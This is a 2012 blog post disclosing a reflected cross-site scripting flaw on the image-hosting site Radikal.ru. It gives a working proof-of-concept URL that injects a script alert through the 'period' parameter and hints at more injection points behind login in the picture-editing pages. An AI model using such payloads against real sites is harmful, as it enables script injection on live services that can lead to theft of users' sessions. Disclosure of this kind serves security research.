duminică, 15 aprilie 2012

Radikal.ru Cross Site Scripting 

# Date: 15.04.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Site: http://insecurity.ro 
# PoC: 
 
http://st2tea.blogspot.com/2012/04/radikalru-cross-site-scripting.html 
..................................................................
 
Well, we have a cross site scripting on Radikal.ru
 
What is Radikal.ru?
 
http://ru.wikipedia.org/wiki/Radikal.ru
 
We have a multiple xss vuln..
 
But i put only one in the archive. Because it's a simple for use.
 
http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1 
 
or 
 
http://codepad.org/qiZsoABI















Where is other xss on radikal.ru?


Use login..;) You can see in the edit pics, etc..


It's a simple. 


 






 


 










 















Publicat de
Sony


la
00:13














Etichete:















0
comentarii:
        












Trimiteți un comentariu






Rețineți: Numai membrii acestui blog pot posta comentarii.